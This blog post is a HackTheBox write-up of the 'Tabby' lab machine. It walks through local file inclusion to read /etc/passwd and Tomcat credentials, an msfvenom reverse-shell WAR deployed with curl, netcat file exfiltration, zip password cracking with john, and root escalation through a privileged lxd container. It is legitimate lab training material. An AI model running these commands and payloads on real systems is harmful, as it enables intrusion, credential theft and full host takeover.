HackTheBox: Tabby

Image for post

Host Enumeration

As standard with HackTheBox, our approach is to identify services that are running on the host using a port scan. For this we’ll use nmap. Firstly, I’ll scan for the top 1000 ports in a standard scan, followed by a version and script scan with identified ports. We see that there are three ports open:

  • 22: SSH (OpenSSH 8.2p1)
  • 80: HTTP (Apache httpd 2.4.41)
  • 8080: HTTP Proxy (Apache Tomcat)

Enumeration – HTTP

Alright, let’s jump straight to the web server that is being hosted on port 80. We see in the nmap scan above that there is a HTTP title Mega Hosting, whcih makes sense because we see a hosting service on the front page. When initially browsing the page and inspecting the hyperlinks, we see an interesting link under news. More specifically, the News button in the topbar navigates to http://megahosting.htb/news.php?file=statement

Port 80 Front Page

The mega hosting page seems to have suffered a data breach. The interesting part of this is the ?file parameter in the URL, which suggests that the page is populated with content from the statement file. Of course this is local file inclusion, but we do not yet know if we can include other system files which we perhaps shouldn’t have access to. As a start, I always like to try loading the /etc/passwd file. In the screenshot below we see that the local file inclusion has worked! Also notice the ash user. Perhaps not too relevant right now, but we may be able to use this later.

Include /etc/passwd file

I did some further enumeration on this port, but I wasn’t able to extract further information. I also searched for hidden pages using a gobuster scan, and we find some more hits but nothing which we can use yet because they are not accessible for us (the /assets and /files responses are folders for which we do not have access to).

Gobuster scan

Enumeration – HTTP-Proxy

As identified from our nmap service enumeration, we are expecting to see a Tomcat service hosted here. And we do! In the screenshot below we see a default It works ! page. But do notice that we see some information which could help us further. It says that users are defined in tomcat-users.xml and we can also derive the full path for it based on the information highlighted.

It works!

Remember that we have the local file inclusion vulnerability which we validated by loading the /etc/passwd file. Let’s instead grab the tomcat-users.xml file!
username: tomcat
password: $3cureP4s5w0rd123!

Grab credentials

Alright let’s go back to the 8080 page, and we see that there are links to the manager webapp and host-manager webapp. The credentials were unsuccessful to log in to the /manager page. But we were able to log into the /host-manager page without problems. Nevertheless, using this account we should have access to the manager-script which seems interesting.

If you’ve been around in HackTheBox for long enough, then you might remember the Jerry host which also exploited tomcat to get a reverse shell. Let’s try that here too.

Getting the initial shell

Thankfully Tomcat installations have their documentation in the /docs directory. Upon reading the manager-script documentation, we see there is an entry for deploying a new WAR application remotely… This sounds like something that we might want to do

Detailed documentation

So, let’s try to upload something to that destination. First we have to create our malicious WAR file, then we use our credentials to upload it to the server. Let’s use the commands below

$ msfvenom -p java/jsp_shell_reverse_tcp -f war LHOST=<yourHTBaddress> LPORT=1234 > frosty.war
$ curl -u 'tomcat':'$3cureP4s5w0rd123!' -T frosty.war 'http://tabby.htb:8080/manager/text/deploy?path=/frosty_labs'
Upload reverse shell

Then we need to trigger the reverse shell. We can either navigate to it, or use wget in the terminal. Nevertheless, we get a shell as tomcat user on the Tabby host!

Trigger reverse shell

Privilege Escalation to Ash user

We identified earlier that the primary user on this box would be ash by loading the contents of /etc/passwd in our LFI exploit. As this HTB box is an easy rated one, we expect to find some sort of password somewhere or some information which we can use to get a password.

When looking through the web files, we see a peculiar file 16162020_backup.zip located in /var/www/html/files. Let’s use netcat to transfer this to our localhost, maybe there is some file with a password in there.

Exfiltrate the file

When trying to unzip the files, we are actually prompted to put in a password; these are password protected files. Alright, maybe we can crack the password. I’ll use the zip2john file to try and extract the password hash, which we hopefully should be able to crack using rockyou.txt. Let’s use the following commands. In the screenshot below we see that it actually worked. We got the password admin@it.

$ zip2john 16162020_backup.zip > crack_me.john
$ sudo john --wordlist=/usr/share/wordlists/rockyou.txt crack_me.john
Crack the hash

So then I re-tried to unzip the files and of course it worked, then I inspected the files some more. I couldn’t gather any further information there which was a little bummer. But perhaps the admin is lazy and is re-using passwords. I tried to ssh into the box as ash, but that failed. Nevertheless, we have our tomcat reverse shell which we could use to switch user – which works.

Switch user to ash

Privilege Escalation to root

We actually see what we need to do in the last screenshot. The lxd group has a potential privilege escalation path which we should try out. We follow the steps from hackingarticles below.

Firstly we need to configure lxd using lxd init. It’s important to use the dir mode for the question which asks the name fo the storage backend to use. The rest we can leave default

Configuring lxd

The next stage is to build a malicious alpine image for lxd using the lxd-alpine-builder

$ git clone http://github.com/saghul/lxd-alpine-builder.git
$ cd lxd-alpine-builder
$ ./build-alpine
Build malicious alpine image

We get a resulting alpine tar.gz file, which we need to transfer to the tabby host. We can do this easily using Python’s SimpleHTTPServer and performing a wget in out ash session.

Transfer malicious alpine image to tabby

After transferring the file, we can import the image using lxc. After importing the image, we need to initialize it with privileged security permissions. Then we add the root folder and then we are done.

$ lxc image import ./alpine.tar.gz frostyimage
$ lxc image list # verify import 
$ lxc init frostyimage frosty -c security.privileged=true
$ lxc config device add frosty mydevice disk source=/ path=/mnt/root recursive=true
$ lxc start frosty
$ lxc exec frosty /bin/sh
~ # 
import malicious alpine

Because the file system begins at /mnt/root, we need to find the root flag in /mnt/root/root/root.txt

Capture the flag

Leave a Reply

Your email address will not be published. Required fields are marked *

This site uses Akismet to reduce spam. Learn how your comment data is processed.